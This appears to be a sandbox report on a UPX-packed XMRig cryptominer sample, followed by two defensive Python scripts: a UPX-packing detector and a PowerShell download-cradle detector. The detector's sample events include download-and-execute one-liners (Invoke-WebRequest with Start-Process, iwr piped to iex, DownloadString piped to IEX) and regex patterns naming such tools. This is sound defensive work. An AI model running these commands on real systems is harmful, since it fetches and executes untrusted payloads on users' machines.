General

  • Target

    a46529389faeecf1ca33e234a0a621d0_NeikiAnalytics.exe

  • Size

    1.6MB

  • Sample

    240524-etzfqscg8z

  • MD5

    a46529389faeecf1ca33e234a0a621d0

  • SHA1

    946123f28c252808423b3271d79873b099ae4a7b

  • SHA256

    07b076842e19795fe7ee9eb300ab099ffc820342d74d4ad513792f9a8d5315be

  • SHA512

    4d7cfa05b1a91d5e9cc0a3eeef9b956d9c1646230653ce846066e72c6dea49faaa2c8abfbd89dddc9b74af618008f38c2a81b1c024ca361f067321eaa928a557

  • SSDEEP

    24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsZLHYm2WVDi9UYd:Lz071uv4BPMkFfdg6NsNtJVi1

Malware Config

Targets

    • Target

      a46529389faeecf1ca33e234a0a621d0_NeikiAnalytics.exe

    • Size

      1.6MB

    • MD5

      a46529389faeecf1ca33e234a0a621d0

    • SHA1

      946123f28c252808423b3271d79873b099ae4a7b

    • SHA256

      07b076842e19795fe7ee9eb300ab099ffc820342d74d4ad513792f9a8d5315be

    • SHA512

      4d7cfa05b1a91d5e9cc0a3eeef9b956d9c1646230653ce846066e72c6dea49faaa2c8abfbd89dddc9b74af618008f38c2a81b1c024ca361f067321eaa928a557

    • SSDEEP

      24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsZLHYm2WVDi9UYd:Lz071uv4BPMkFfdg6NsNtJVi1

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX, or with a modified build of the open-source UPX packer.

    • Legitimate hosting services abused for malware hosting/C2
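
The UPX signature above rests on a static layout check. As an added example (written for this page, not the sandbox's own signature code), the following Python walks a PE section table and applies the indicators that separate stock UPX from a modified build that strips the UPX0/UPX1 names and the "UPX!" string: section names, the magic string, an empty first section with a large virtual size, and per-section entropy. The three PE images are constructed inside the script and are not the report's sample; the 7.0 bits/byte entropy threshold and the 0x1000 virtual-size floor are assumed working values, not constants from the report.

```python
"""Static check for UPX packing in a PE image, standard library only."""
import math
import random
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}   # names stock UPX gives its sections
ENTROPY_THRESHOLD = 7.0                        # assumed: compressed data sits near 8.0 bits/byte


def shannon_entropy(buf):
    """Bits of entropy per byte (0.0 to 8.0); 0.0 for an empty buffer."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(data):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)    # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)       # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name = data[off:off + 8].rstrip(b"\x00").decode("latin-1")
        vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name, "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(raw)})
    return sections


def detect_upx(data):
    """Return a verdict plus the individual indicators it rests on."""
    sections = pe_sections(data)
    names = {s["name"] for s in sections}
    ind = {
        "upx_section_names": bool(names & UPX_SECTION_NAMES),
        "upx_magic": b"UPX!" in data,
        # Stock UPX layout: the first section has no raw bytes but a large virtual size
        # (it is where the stub unpacks the original image at run time).
        "empty_raw_large_virtual": any(s["raw_size"] == 0 and s["virtual_size"] >= 0x1000
                                       for s in sections),
        "high_entropy_section": any(s["entropy"] > ENTROPY_THRESHOLD for s in sections),
    }
    if ind["upx_section_names"] or ind["upx_magic"]:
        verdict = "upx"
    elif ind["empty_raw_large_virtual"] and ind["high_entropy_section"]:
        verdict = "packed-unlabelled"   # UPX-like layout with the tell-tale strings removed
    else:
        verdict = "no-upx-indicators"
    return {"verdict": verdict, "sections": [s["name"] for s in sections], **ind}


def build_pe(sections, magic=b""):
    """Construct a minimal, non-runnable PE image for testing (headers + section data)."""
    opt_size = 0xE0                                              # PE32 optional header
    header_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_start = (header_len + 0x1FF) & ~0x1FF                    # file-align section data
    table, blobs, vaddr = b"", b"", 0x1000
    for name, vsize, raw in sections:
        ptr = raw_start + len(blobs) if raw else 0
        table += name.ljust(8, b"\x00") + struct.pack(
            "<IIIIIIHHI", vsize, vaddr, len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += raw
        vaddr += (max(vsize, len(raw)) + 0xFFF) & ~0xFFF
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)        # e_lfanew at offset 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)
    img = dos + b"PE\x00\x00" + coff + opt + table + magic        # magic placed in header slack
    return img.ljust(raw_start, b"\x00") + blobs


# Constructed samples (not the report's binary): seeded pseudo-random bytes stand in for
# compressed code, a repeated instruction-like string for plain code.
_rng = random.Random(0x5EED)
_PACKED = bytes(_rng.getrandbits(8) for _ in range(4096))
_PLAIN = (b"mov eax, ebx; push ebp; " * 171)[:4096]
_ZEROS = b"\x00" * 0x200

SAMPLE_UPX = build_pe([(b"UPX0", 0x20000, b""), (b"UPX1", 0x1000, _PACKED),
                       (b".rsrc", 0x200, _ZEROS)], magic=b"UPX!")
SAMPLE_MODIFIED_UPX = build_pe([(b".code0", 0x20000, b""), (b".code1", 0x1000, _PACKED),
                                (b".rsrc", 0x200, _ZEROS)])
SAMPLE_CLEAN = build_pe([(b".text", 0x1000, _PLAIN), (b".data", 0x200, _ZEROS),
                         (b".rsrc", 0x200, _ZEROS)])

if __name__ == "__main__":
    for label, img in [("upx", SAMPLE_UPX), ("modified", SAMPLE_MODIFIED_UPX),
                       ("clean", SAMPLE_CLEAN)]:
        print(label, detect_upx(img))
```

The name and magic checks are what a stock-UPX rule keys on; the empty-first-section and entropy checks are what still fire once an attacker rebuilds UPX with those strings changed, which is the "modified UPX" case the signature text mentions. Run against a real file with detect_upx(open(path, "rb").read()).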

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic                Technique                            ID          Hits
  Execution             Command and Scripting Interpreter    T1059       1
  Execution             PowerShell (sub-technique)           T1059.001   1
  Command and Control   Web Service                          T1102       1
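
The PowerShell (T1059.001) and Web Service (T1102) rows above describe a download cradle fetching from a hosting service. As an added example, not code from the report or the sandbox, the following Python runs that detection over PowerShell script-block log text (Event ID 4104): it finds the cmdlet, its Windows PowerShell 5.1 aliases and the .NET download calls, extracts the URL hosts, and flags when the fetched content is piped to Invoke-Expression or written to disk. The events, the IP address (documentation range) and the watched-host list are constructed for the example; the report names no specific hosting service, so that list is an assumption to replace with your own.

```python
"""Flag PowerShell download cradles in script-block (Event ID 4104) text, stdlib only."""
import re
from urllib.parse import urlparse

# The cmdlet, its Windows PowerShell 5.1 aliases, and .NET equivalents commonly used instead.
CRADLE_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|curl|wget)\b"
    r"|Net\.WebClient|DownloadFile|DownloadString|DownloadData",
    re.IGNORECASE)
EXEC_RE = re.compile(r"\b(iex|Invoke-Expression)\b", re.IGNORECASE)
DROP_RE = re.compile(r"-OutFile\b|\bStart-Process\b", re.IGNORECASE)
URL_RE = re.compile(r"""\bhttps?://[^\s'"`;)]+""", re.IGNORECASE)

# Hosts to treat as "legitimate service, watch for abuse". Constructed example list
# (assumption): the report names no specific service, so fill this from your own telemetry.
WATCHED_HOSTS = {"pastebin.com", "raw.githubusercontent.com", "transfer.sh"}


def analyse_script_block(text):
    """Classify one script block; 'flags' is empty when nothing cradle-like is present."""
    cradles = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(text)})
    urls = URL_RE.findall(text)
    hosts = [urlparse(u).hostname for u in urls]
    flags = []
    if cradles:
        flags.append("download_cradle")
        if any(h in WATCHED_HOSTS for h in hosts):
            flags.append("watched_hosting_service")
        if EXEC_RE.search(text):
            flags.append("download_and_execute")   # fetched content piped into iex
        if DROP_RE.search(text):
            flags.append("drop_to_disk")           # written out and/or launched as a file
    return {"cradles": cradles, "urls": urls, "hosts": hosts, "flags": flags}


def scan_events(events):
    """Run the classifier over 4104 events only; other IDs carry no script-block text."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        result = analyse_script_block(ev["script"])
        if result["flags"]:
            hits.append({"record": ev["record"], **result})
    return hits


# Constructed sample events (documentation IP range and example.org, not report data).
SAMPLE_EVENTS = [
    {"record": 1, "event_id": 4104,
     "script": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"record": 2, "event_id": 4104,
     "script": "Invoke-WebRequest -Uri 'http://198.51.100.7/p.bin' -OutFile \"$env:TEMP\\p.exe\"; "
               "Start-Process \"$env:TEMP\\p.exe\""},
    {"record": 3, "event_id": 4104,
     "script": "iwr https://pastebin.com/raw/AbCd1234 -UseBasicParsing | iex"},
    {"record": 4, "event_id": 4104,
     "script": "(New-Object Net.WebClient).DownloadString('https://example.org/loader.ps1') | IEX"},
    {"record": 5, "event_id": 4688,
     "script": "Invoke-WebRequest -Uri http://198.51.100.7/p.bin"},   # wrong event type, skipped
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["record"], hit["flags"], hit["hosts"])
```

Script-block logging has to be enabled (Turn on PowerShell Script Block Logging) for 4104 events to exist at all; without it, the only trace of an Invoke-WebRequest cradle is whatever survives in process creation or proxy logs, which is why the "drop_to_disk" and "download_and_execute" distinctions are worth keeping separate when you tune alert severity.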

Tasks